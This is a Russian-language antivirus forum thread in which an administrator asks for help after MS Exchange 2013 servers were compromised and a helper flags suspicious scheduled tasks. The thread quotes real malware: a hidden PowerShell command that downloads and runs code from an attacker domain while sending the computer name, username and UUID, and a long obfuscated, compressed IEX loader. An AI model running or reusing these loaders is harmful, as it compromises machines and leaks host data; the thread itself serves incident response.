ESET CONNECT

[QUOTE]santy написал:
если будет возможность перегрузить сервера,
выполните в uVS вначале твик 39, потом перегрузить систему, потом еще раз снять в uVS образы автозапуска, для проверки,
возможно получиться увидеть, кто  эти задачи создает.
(при условии, конечно, если они будут воссозданы)

  [/QUOTE]
твик 39 что то найти не могу, найду.
Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)

[QUOTE]santy написал:
[QUOTE] Владимир Шариков написал:
[QUOTE] santy написал:
[QUOTE] Владимир Шариков написал:
Положу сюда сразу два образа двух серверов.[/QUOTE]
можно и второй образ положить[/QUOTE]
[/QUOTE]
по второму серверу:
это нормальный софт?
C:\PROGRAM FILES\WIN-ACME\WACS.EXE
--RENEW --BASEURI "[URL=HTTPS://ACME-V02.API.LETSENCRYPT.ORG/"]HTTPS://ACME-V02.API.LETSENCRYPT.ORG/&quot[/URL];[/QUOTE]
Да, это сертификаты обновляет.

[QUOTE]santy написал:
[QUOTE] Владимир Шариков написал:
Положу сюда сразу два образа двух серверов.[/QUOTE]
можно и второй образ положить[/QUOTE]

[QUOTE]santy написал:
сервер можно будет перегрузить (скриптом)?[/QUOTE]
Через пол часа можно будет.
[QUOTE]santy написал:
[QUOTE] Владимир Шариков написал:
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?[/QUOTE]
шифрованный код. понятно, что расшифровывается на вашей системе, или наоборот в зашифрованном виде уходит в сеть[/QUOTE]
Как его возможно расшифровать? Нужно понять что хакер хотел добиться. Как мы поняли хекер воспользовался уявимостью, при обращение к екчанджу происходит срабатывания нескольких скриптов (каких мы не знаем). Но заметили что меняются ДНСы сервера.
[QUOTE]santy написал:
есть задачи, через которые возможно пытаются перехватить пароли.
[QUOTE]C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
-W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))[/QUOTE]
[/QUOTE]
Вот это слово "Возможно" пугает ))) Тут как я понимаю срабатывает Имя ПК, Индефикатор, и имя пользователя.

Вот это не ясно [URL=http://t.netcatkit.com/a.jsp?_20210317][S]http://t.netcatkit.com/a.jsp?_20210317[/S][/URL][S]?[/S] :

Скрытый текст

I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('ad59f973db46acfed9fe2b588e12919548ebb21d3ba369555fd16b7c3ccb­49dab15c85225712235e5d52b6d5d8ff7b3f60495d71dbbc99a79b4b2c16­8be303b0f247c66d37caae32797778d8f3ff129a25fed4de985f4b7ebad7­6a97323913cfdbdb257f34f4a3b6ee8f6c7ceb3c107abb6d5db4f65b07bb­9e531f366b43cfa98956a3f6e6c075f6466e6d7fb8d720d2a9e4b95359cc­9d4a9edb745b6e4decefbea9d7dcdac873446358abef3586adc648d45a4e­0da4108f0531bf6e6f6f9542e613eee57c30c07c5ab55a7de81cbc715a8d­d6c81bee356bad7da7d1744607fbc2dd3d203e201de793c7cbd9639eee1c­34eac3dd66c3dbf51acd03d1721a62bf2e76476f769bf5835dd7032d3430­9a456ee6c79146938c92c712ddf6843b937e36b78fe43cc9e2b17492c9dc­3e3fde85368fa470326198f6511c26b34cbc73d2094d7c1ac5b8e34ebe96­824abb34b06fe25e26fd686c941f1b65134b6d4991cd64a495828d954526­2327044bacade1519289934ddafad161ff931f79f143daefcdd34c84cd46­3190c40f42a6131104fd8f759b54c11305f149b5b636767d4d577cfa3fea­9ad58ddc60e609ed475b3cc2174e1ed5e5920d8d2f7730b089118464ae19­54433ce90b6e75699ffa818026ae85e37582e097792652a3586d9da56e9a­8a49ceda50226a3ed4a0842d36cd2b618541fbfbd651d317fce9415ec5b2­92af33af55e6f4282cc07397b7f28d16fbe5bb6deb4bec47c6ad3b71e4ed­dd9dd17a63dbbbfb95bd5ddb3ea8550ef66dbbde68984f6722b3ae1dd824­d4aca37816659ab1573196a3e6ab3dd3d42a9aceda500bb87132b77cd873­61a20da52dc6f34d3ec5b3cc8a66011c27dfe70f0674915944b4496c22c8­d50ef40db6f9fe3694403020d584c21331123010544b01c522bef2d8d6ab­fcdadecee41c8eaed0e2bf0c26a2fbc32c4cfa0a6d20e0b3eb647033acac­d870bc7f3717828b17982809bf9b0ba3d71a1bec1aa1150d663280b7eb93­2c4b0e777668c84eff0c229181d276e350e1d70f25d041d5f86c17b499ad­a8a6be2224d5ba70fc9c25d1da6912f899a1efe8e66dcdb61b77ec66b8a4­e51321433f03a5b144a02b6088eb274e60e7a1bf18b8fb17a2ae27a20c77­a000f8e2d14cc2c299619a7637ed46d77120fe6d855f667e9029b23b4def­78a11ff969269d2c963ac20d5b0a93018731f6440a3dba3cbffa7073727d­d1393fc1fdf1ccf768137027eb21f4e3e117e1661a98371b831c34a502b4­2b197b333733ed0f1fbac798193a2e4da4f0f914fa97ab132f44f610cb69­c773124c3f8aa3913f9e412642d027ed6122a4d008b8fc04be3c0c840794­fb5f6017253ad33e775cc7f3a4485310a722005f2b97cb1af932cdb43a96­8fd3e1b7cb5b6ee0609a92e21226c29ad158c94fda88096f69aa7d04d120­8e2d451238ae30f473df95711a8f780fa4598d82c7ace803bdc2333e223c­31035c66a990853a3ff416aa048238c0ca6f847a6069c810a4cc5409631f­33357183206c9e5bfa4e132782239cca383cf783c04f851b475e6adc6231­5fc65108dfc0fd1bdf9d3284ada4b2819dc59913e433d89f1dc9c67dc946­1f7d4fc4304d26e32010d2e42cb2bd3d8613e414579379eabb4e702ec258­ce618b575f4b613a0bc1b1f6ac7d056ad345058a18903a1d170eaa3dbf2d­85226cf3bd9dfad950453c6947faf7b44be35669c046d81fd358371ac5ca­f5f93235cc351fe9a6840a73cd02446b06063af78e1f90d79c4a217a5816­39720c9fa8355a664e4564ccec669ea86a4abfc626ee69960ea25832a70d­92dc6b81339b6c4e63193af02ea6ba39ed6df258bd7fdab9693608abb08b­c234447801f50246eed8a1d65687d910b1547d9844f06c2a9879d2977057­62d7c89c3029cc798cba46b33ee42bebaf52ddb47bb361cea8563d80bb2b­cddf5e8b11c510797b274d45380c086adec78ef7c9cf26578ecc7c2720f1­0c5d458afd490ced93c74c44e4f0e04c9133fc424b5f8807ab702310f55c­e92799dd13122cfcbf38c2edff71ee1d75a31827f73a16881a75a5181846­243e3f50647f26764063fb410cddcf810f17376d9dc03c80906a4bba51ce­81bbded8b76b78d60f5bcdbdbd839dfa0e5c2d74e4bc4cf54529bc6f93b0­f6fd225c433f5143888b2857849fd08d89543726280b0115640904902a26­ca5514826b690b55610f9a3f4faea418c13d23f2bc633f25af828f0664a3­f338f201bd1098406aabe3791bf45ccd916057540eb887fdffa092b14b40­0842c00897972a7c96e5e515150e3d2e2fef515e6ed427aa8cf8ff5d212f­41508e2cf483246b28b8b1e08f2e0a9db39bdf9e2e3e768fbb9da7b393d3­cbeba313ae76fc346ad75f9c70ed0090a2a7cef9714ee8306109f65cc9c5­3f2117d7ef28ff3ad209d3f6cf46e9bebacc72554e68554a4e7918bda66c­bd9dc270410c7129051585c54a5d9f66895142eb5014a10fc8b6c29a2030­351a26d3670814abd09645158b3261e8a93abd23c73342e7f7c8bf9abee3­f2c4cdc6c545d9ebc61ee40c21e528e216c6280b77126be50adfaa94dfe6­9d5db98ca1d0abe09b86e0c5b9e018e9e3d62852b78a4a484d28aef8de46­cb840830bfdee651fe7f6f9c68fa32dfa41bad13f54e8899b745cd9a3ec3­c8cbd2977600bb82c7a05d88f00fa51f9322912c3a0c9ef5967a061a03ce­2a0d815d14cf12f8092df5035fa825da402a800b9086c105d04ea0765480­4b812d9e9339e807971adbc9d5fa13be9587911a214bb61484e5c85684f8­76379fc87dd6b6433e1a99cf02e9794de85599d52e73e3f34e9fcbe6a242­293f0192fef8e38fa7d5b1d76aec7519d0b7e66809f6354244544b1416b9­9bc17410a65dc31a9a15c0b5b1205011658455c758a55d37bf924c18be2d­f9779cd06a8f3544c510369f3e3fbff53f8b478303ab68b69818d531e8a1­266af057930454f28b1f019cc9be42aede5a2a8d7c8cca3d02e6b3bffc04­0e259c702dd92c895535a2480cd6ea2df654a99bb6cd82abfd9877a65955­bdc52af795dfe7083558ea18d5921a3351719394ca66f59a7aa83d0ddaf4­691f057184a0a012672d18cb15bdcfdab601fd3a07de7ffa0458549975c5­30ead4a0eebfd4a0420cd37c4b4154d7acab139eabd1b4ef778c8afec43e­a059da6b80950664a2a656db996baf20feaba5e46bd78469af374736e12c­19c28173ff22d82c773f9ffcf6ad7f984f0827a2ab9435abbc098930047c­35303572d2b26a1001d501852262b28d4f27156f57bce16602eb7b001dfb­1cd8f4886844e7502d97cf8278e8047df17e657ab95cbd45debb5be3b9c8­ec4a18c6dd7a9b45d1f4ee08dbc4461e293e30ae8ec0787a77c491846c81­ea10609e5310b6313a70d36c560c280627439c25a92851f96ee5148d6635­8af56ecef92c6cb96203578b257197e76c2eda40fdcd6b528bcd4b3aeaf7­eac25b58b948b6c8bc5cb55266cd2bdc0d899a2b128dd7456a6e88347e51­a626245030c9477d0ba9e8e205b1784eab58f457b9a6f6d68ada7f952fa9­bda5a9534cfafa27b573e1b6d1dce64da26acb507652d1efa85615bebad2­aaa2db0c30a82ddad436f919ea6cb42a173d14b7a8317bc291eee45212b8­fd6c94dfd8fc44f01dd8fc4451ba52c6e729a58daaa40272f495553afabd­634354b9b1ace67d24bea94100c2a14842b920c29c541d3c54a11a763ac2­deddfc6442376998dce2db5156d5c6308a65bc7d00114a612ccf9d6875d9­6c54f59addd217851454ba08db5ef7e437f4801acc820e02504c47b1aa54­bfa37a6d7b8beccc65f3d656890a7b4ebde821fe2531934b9546c817417e­ae439cf40a8abe8a9eeb8edc52b1c5f70a63fb1d2798d4465237f40f50a4­d519631c4dfc7b648cc83a9eb9530bad3c5f0de86a09967dd8cbe2f6616b­eb595b980bfc91180643065db4b9cbc5f4e3bc80401be6e840af5c66e6b0­55a2191d299d3975f57922b8118f997d12c171494587879dde51b76b03f1­f3f269b99462b2450a5e72a2a0594a86171b405f1c59ed6033b1ccec2f69­4205afd290021d38f246b0475e5b8fee3d1bb9964fe1236fdc5e1eb7e1ce­d8466544b7368e2f8932ef7d295775e95c94c7ec404463105891d01a8d5a­73f7600f7f60d046d6bbbccd426ca1484a9250e4a214d377c017c65b1e02­e29235b35a16204b864585c01d4f27419ba0ca7c935b6e3e20a0936ce642­f56c327f872668f57831f270ee5eadef317b3e2810f9d6564816a8b57208­599a4cd3b6feeed793df07ef2f8f3aef07e79da377dd8b937eeff2f4e653­e7faa44f7fb58469dc5e1e2ff52f4723dfa54c5a7a203b7c8a1ff65acdc6­05008da95d19e2df046c627a135fcfa2fef5c959b77773fd7b7fc11b4c1e­1ca9a8c92ad404e9240aad442aa39fe0bd7a899f7d62fde258414bf15d1c­fdb3b909b5790532e55a317f2dc674cc383f3c6402ba4f20eb4efcc0e3d3­f20d0238068cf1c4c73af9611e0e7716bd5fdfabe08f0f3e74b9a135b8b3­da60d12f0dfa97b32c88e3a9f9bce842f2bf01d2a998b771c8f34f33fa45­b3b370eae53a3c192d27599f7c4b999e0695cdb9eba741347f005f1c72f1­4d4d391ed591c1d98c3ad9866665749a748c8c42fe520a51b98cdb2be1a3­983e3fe70501dfe7859755cf394eb7bebfe4c92b1e2e7868e65ab143032b­d96799c0f906ef7733be0b871fc75e88b39a969d3d66b96ab672c4294274­c71f0d90a882e2bf3c56d5a2de7891eb74da9a4eed201e2b969b0ca1c99c­d9f3f6df'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

Что этот код делает? Стоит ли боятся "Последствий" этой бяки?

Да.

Здравствуйте. MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить. Удалять сам не стал из "шидулера", реестра. Обновления на двух серверах уже установили, закрывающую уязвимость. Если будут еще какие то комментарии напишите пожалуйста.
Положу сюда сразу два образа двух серверов. Если необходимо могу тему скопировать, по одному образу выложу.

Извините что долго не отвечал.
И таких много служб... Как то подозрительно!!!

ага

Здравствуйте. Службы непонятные... Нормально ли всё?